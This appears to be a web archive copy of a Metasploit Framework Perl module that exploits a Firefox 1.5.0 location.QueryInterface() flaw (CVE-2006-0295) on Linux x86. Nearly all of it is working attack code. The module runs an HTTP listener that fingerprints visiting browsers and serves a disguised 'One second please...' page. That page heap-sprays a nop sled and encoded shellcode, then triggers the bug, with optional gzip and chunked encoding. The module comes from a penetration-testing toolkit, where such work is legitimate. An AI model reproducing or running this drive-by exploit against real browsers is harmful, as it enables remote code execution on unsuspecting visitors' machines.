home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / firefox_queryinterface_linux.pm < prev    next >
Text File  |  2006-06-30  |  6KB  |  274 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::firefox_queryinterface_linux;
  11.  
  12. use strict;
  13. use base "Msf::Exploit";
  14. use Pex::Text;
  15. use IO::Socket::INET;
  16. use IPC::Open3;
  17.  
  18. my $advanced =
  19.   {
  20.     'Gzip'       => [1, 'Enable gzip content encoding'],
  21.     'Chunked'    => [1, 'Enable chunked transfer encoding'],
  22.   };
  23.   
  24. my $info =
  25.   {
  26.     'Name'           => 'Firefox location.QueryInterface() Code Execution (Linux x86)',
  27.     'Version'        => '$Revision: 1.2 $',
  28.     'Authors'        =>
  29.       [
  30.         'H D Moore <hdm [at] metasploit.com>',
  31.       ],
  32.  
  33.     'Description'    =>
  34.       Pex::Text::Freeform(qq{
  35.         This module exploits a code execution vulnerability in the Mozilla
  36.     Firefox browser. To reliably exploit this vulnerability, we need to fill
  37.     almost a gigabyte of memory with our nop sled and payload. This module has
  38.     been tested on Gentoo Linux with the stock Firefox 1.5.0 package.
  39. }),
  40.  
  41.     'Arch'           => [ 'x86' ],
  42.     'OS'             => [ 'linux' ],
  43.     'Priv'           => 0,
  44.  
  45.     'UserOpts'       =>
  46.       {
  47.         'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
  48.         'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
  49.       },
  50.  
  51.     'Payload'        =>
  52.       {
  53.         'Space'    => 1024,
  54.         'BadChars' => "\x00",
  55.         'Keys'     => ['-bind'],
  56.       },
  57.     'Refs'           =>
  58.       [
  59.           ['OSVDB', '22893'],      
  60.           ['CVE', '2006-0295'],
  61.           ['BID', '16476'],
  62.           ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
  63.       ],
  64.  
  65.     'DefaultTarget'  => 0,
  66.     'Targets'        =>
  67.       [
  68.         [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]
  69.       ],
  70.     
  71.     'Keys'           => [ 'mozilla' ],
  72.  
  73.     'DisclosureDate' => 'Feb 02 2006',
  74.   };
  75.  
  76. sub new {
  77.     my $class = shift;
  78.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  79.     return($self);
  80. }
  81.  
  82. sub Exploit
  83. {
  84.     my $self = shift;
  85.     my $server = IO::Socket::INET->new(
  86.         LocalHost => $self->GetVar('HTTPHOST'),
  87.         LocalPort => $self->GetVar('HTTPPORT'),
  88.         ReuseAddr => 1,
  89.         Listen    => 1,
  90.         Proto     => 'tcp'
  91.     );
  92.     my $client;
  93.  
  94.     # Did the listener create fail?
  95.     if (not defined($server)) {
  96.         $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
  97.         return;
  98.     }
  99.  
  100.     my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
  101.         Pex::Utils::SourceIP('1.2.3.4') :
  102.         $self->GetVar('HTTPHOST');
  103.  
  104.     $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
  105.  
  106.     while (defined($client = $server->accept())) {
  107.         $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
  108.     }
  109.  
  110.     return;
  111. }
  112.  
  113. sub HandleHttpClient
  114. {
  115.     my $self = shift;
  116.     my $fd   = shift;
  117.  
  118.     # Set the remote host information
  119.     my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
  120.         
  121.  
  122.     # Read the HTTP command
  123.     my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
  124.     my $agent;
  125.     
  126.     # Read in the HTTP headers
  127.     while ((my $line = $fd->RecvLine(10))) {
  128.         
  129.         $line =~ s/^\s+|\s+$//g;
  130.         
  131.         my ($var, $val) = split(/\:/, $line, 2);
  132.  
  133.         # Break out if we reach the end of the headers
  134.         last if (not defined($var) or not defined($val));
  135.  
  136.         $agent = $val if $var =~ /User-Agent/i;
  137.     }
  138.     
  139.     my $os = 'Unknown';
  140.     my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';
  141.     
  142.     $os = 'Linux'     if $agent =~ /Linux/i;
  143.     $os = 'Mac OS X'  if $agent =~ /OS X/i;
  144.     $os = 'Windows'   if $agent =~ /Windows/i;    
  145.     
  146.     
  147.     $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
  148.     
  149.     if ($os ne 'Linux') {
  150.         $self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
  151.     } else {
  152.         $self->PrintLine("[*] Sending payload and waiting for execution...");    
  153.     }
  154.  
  155.     my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
  156.  
  157.     $fd->Close();
  158. }
  159.  
  160.  
  161. sub JSUnescape {
  162.     my $self = shift;
  163.     my $data = shift;
  164.     my $code = '';
  165.     
  166.     # Encode the shellcode via %u sequences for JS's unescape() function
  167.     my $idx = 0;
  168.     while ($idx < length($data) - 1) {
  169.         my $c1 = ord(substr($data, $idx, 1));
  170.         my $c2 = ord(substr($data, $idx+1, 1));    
  171.         $code .= sprintf('%%u%.2x%.2x', $c2, $c1);    
  172.         $idx += 2;
  173.     }
  174.     
  175.     return $code;
  176. }
  177.  
  178. sub GenerateHTML {
  179.     my $self        = shift;
  180.     my $target      = $self->Targets->[$self->GetVar('TARGET')];
  181.     my $shellcode   = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
  182.     my $data        = qq#
  183. <html>
  184. <head>
  185.     <title>One second please...</title>
  186.     <script language="javascript">
  187.  
  188.         function BodyOnLoad() {
  189.             h = FillHeap();
  190.             location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
  191.         };
  192.         
  193.         function FillHeap() {
  194.             // Filler
  195.             var m = "";
  196.             var h = "";
  197.             var a = 0;
  198.             
  199.             // Nop sled
  200.             for(a=0; a<(1024*512); a++)
  201.                 m += unescape("\%u9090");
  202.  
  203.             // Payload
  204.             m += unescape("$shellcode");
  205.             
  206.             // Repeat
  207.             for(a=0; a<1024; a++)
  208.                 h += m;
  209.             
  210.             // Return
  211.             return h;
  212.         }
  213.     </script>
  214. </head>
  215. <body onload="BodyOnLoad()">
  216. </body>
  217. </html>
  218. #;
  219.     return $data;
  220. }
  221.  
  222. sub BuildResponse {
  223.     my ($self, $content) = @_;
  224.  
  225.     my $response =
  226.       "HTTP/1.1 200 OK\r\n" .
  227.       "Content-Type: text/html\r\n";
  228.  
  229.     if ($self->GetVar('Gzip')) {
  230.         $response .= "Content-Encoding: gzip\r\n";
  231.         $content = $self->Gzip($content);
  232.     }
  233.     if ($self->GetVar('Chunked')) {
  234.         $response .= "Transfer-Encoding: chunked\r\n";
  235.         $content = $self->Chunk($content);
  236.     } else {
  237.         $response .= 'Content-Length: ' . length($content) . "\r\n" .
  238.           "Connection: close\r\n";
  239.     }
  240.  
  241.     $response .= "\r\n" . $content;
  242.  
  243.     return $response;
  244. }
  245.  
  246. sub Chunk {
  247.     my ($self, $content) = @_;
  248.  
  249.     my $chunked;
  250.     while (length($content)) {
  251.         my $chunk = substr($content, 0, int(rand(10) + 1), '');
  252.         $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
  253.     }
  254.     $chunked .= "0\r\n\r\n";
  255.  
  256.     return $chunked;
  257. }
  258.  
  259. sub Gzip {
  260.     my $self = shift;
  261.     my $data = shift;
  262.     my $comp = int(rand(5))+5;
  263.  
  264.     my($wtr, $rdr, $err);
  265.  
  266.     my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
  267.     print $wtr $data;
  268.     close ($wtr);
  269.     local $/;
  270.  
  271.     return (<$rdr>);
  272. }
  273. 1;
  274.